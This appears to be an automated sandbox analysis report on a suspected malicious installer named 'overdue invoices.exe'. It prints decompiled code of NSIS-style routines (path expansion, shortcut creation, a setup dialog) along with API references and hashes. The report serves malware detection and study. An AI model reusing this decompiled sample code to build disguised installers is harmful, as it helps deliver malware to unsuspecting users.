                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                  • SetDlgItemTextA.USER32 ref: 00404549
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                  • String ID: A$C:\Users\user\AppData\Local\Temp$ijmyqjlf
                  • API String ID: 2246997448-1811718207
                  • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                  • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                  • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                  • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405AA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x563c02
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x5626dc
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x74691340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}































                  0x00405aa7
                  0x00405aa7
                  0x00405aa7
                  0x00405aad
                  0x00405ab2
                  0x00405ab4
                  0x00405ac3
                  0x00405ac3
                  0x00405ac5
                  0x00405ace
                  0x00405ad0
                  0x00405ad5
                  0x00405ad8
                  0x00405ad9
                  0x00405ae0
                  0x00405ae2
                  0x00405ae8
                  0x00405aeb
                  0x00405aeb
                  0x00405cc0
                  0x00405cc0
                  0x00405cc4
                  0x00000000
                  0x00000000
                  0x00405af8
                  0x00405afe
                  0x00000000
                  0x00000000
                  0x00405b04
                  0x00405b05
                  0x00405b08
                  0x00405b0b
                  0x00405cb3
                  0x00405cbd
                  0x00405cbf
                  0x00405cbf
                  0x00405cb5
                  0x00405cb7
                  0x00405cb9
                  0x00405cba
                  0x00405cba
                  0x00000000
                  0x00405cb3
                  0x00405b11
                  0x00405b15
                  0x00405b1a
                  0x00405b29
                  0x00405b2c
                  0x00405b2e
                  0x00405b33
                  0x00405b36
                  0x00405b39
                  0x00405b3c
                  0x00405b3f
                  0x00405b42
                  0x00405c5d
                  0x00405c60
                  0x00405c90
                  0x00405c93
                  0x00405c98
                  0x00405c9c
                  0x00405c9c
                  0x00405ca1
                  0x00405ca2
                  0x00405ca7
                  0x00405caa
                  0x00405cac
                  0x00000000
                  0x00405cac
                  0x00405c62
                  0x00405c65
                  0x00405c7a
                  0x00405c81
                  0x00405c67
                  0x00405c6e
                  0x00405c6e
                  0x00405c89
                  0x00405c8c
                  0x00405c55
                  0x00405c56
                  0x00405c56
                  0x00000000
                  0x00405c8c
                  0x00405b4a
                  0x00405b4b
                  0x00405b51
                  0x00405b53
                  0x00405b6d
                  0x00405b6d
                  0x00405b74
                  0x00405b74
                  0x00405b7b
                  0x00405b7f
                  0x00405b7f
                  0x00405b80
                  0x00405b82
                  0x00405bbb
                  0x00405bbe
                  0x00405bce
                  0x00405bd1
                  0x00405bd9
                  0x00405bdf
                  0x00405bdf
                  0x00405c3b
                  0x00405c3b
                  0x00405c3d
                  0x00000000
                  0x00000000
                  0x00405be3
                  0x00405bea
                  0x00405beb
                  0x00405bed
                  0x00405c07
                  0x00405c15
                  0x00405c1b
                  0x00405c1d
                  0x00405c38
                  0x00405c38
                  0x00405c38
                  0x00000000
                  0x00405c38
                  0x00405c23
                  0x00405c2e
                  0x00405c34
                  0x00405c36
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c36
                  0x00405bef
                  0x00405bf2
                  0x00000000
                  0x00000000
                  0x00405c01
                  0x00405c03
                  0x00405c05
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c05
                  0x00000000
                  0x00405c3b
                  0x00405bc6
                  0x00000000
                  0x00405b84
                  0x00405b89
                  0x00405b9f
                  0x00405ba4
                  0x00405ba7
                  0x00405c44
                  0x00405c44
                  0x00405c48
                  0x00405c50
                  0x00405c50
                  0x00000000
                  0x00405c48
                  0x00405bb1
                  0x00405c3f
                  0x00405c3f
                  0x00405c42
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405c42
                  0x00405b82
                  0x00405b55
                  0x00405b59
                  0x00000000
                  0x00000000
                  0x00405b5b
                  0x00405b5f
                  0x00000000
                  0x00000000
                  0x00405b61
                  0x00405b65
                  0x00000000
                  0x00405b67
                  0x00405b67
                  0x00000000
                  0x00405b67
                  0x00405b65
                  0x00405cca
                  0x00405cd4
                  0x00405ce0
                  0x00405ce0
                  0x00000000

                  APIs
                  • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                  • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                  • GetWindowsDirectoryA.KERNEL32(ijmyqjlf,00000400), ref: 00405BD9
                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                  • SHGetPathFromIDListA.SHELL32(00000000,ijmyqjlf), ref: 00405C23
                  • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                  • lstrcatA.KERNEL32(ijmyqjlf,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                  • lstrlenA.KERNEL32(ijmyqjlf,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ijmyqjlf
                  • API String ID: 900638850-1263258948
                  • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                  • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                  • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                  • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                  0x0040201b
                  0x00402025
                  0x0040202e
                  0x00402038
                  0x00402041
                  0x0040204b
                  0x0040204f
                  0x0040204f
                  0x00402054
                  0x00402065
                  0x0040206d
                  0x0040214d
                  0x0040214d
                  0x00402154
                  0x00402073
                  0x00402073
                  0x00402084
                  0x00402088
                  0x0040208e
                  0x00402098
                  0x0040209a
                  0x004020a5
                  0x004020a8
                  0x004020b5
                  0x004020b7
                  0x004020b9
                  0x004020c0
                  0x004020c3
                  0x004020c3
                  0x004020c6
                  0x004020d0
                  0x004020d8
                  0x004020dd
                  0x004020e9
                  0x004020e9
                  0x004020ec
                  0x004020f5
                  0x004020f8
                  0x00402101
                  0x00402106
                  0x00402118
                  0x00402127
                  0x00402129
                  0x00402135
                  0x00402135
                  0x00402127
                  0x00402137
                  0x0040213d
                  0x0040213d
                  0x00402140
                  0x00402146
                  0x0040214b
                  0x00402160
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040214b
                  0x00402156
                  0x00402880
                  0x0040288c

                  APIs
                  • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                  Strings
                  • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 123533781-1104044542
                  • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                  • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                  • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                  • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402630 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 39%
                  			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                  0x00402648
                  0x0040265c
                  0x00402667
                  0x00402668
                  0x004027a3
                  0x0040264a
                  0x0040264a
                  0x0040264c
                  0x0040264e
                  0x0040264e
                  0x00402880
                  0x0040288c

                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                  • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                  • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                  • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403964 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423ec4; // 0x2
							__eflags =  *0x4091bc - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, "vmklrdjtbsiifoh Setup");
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
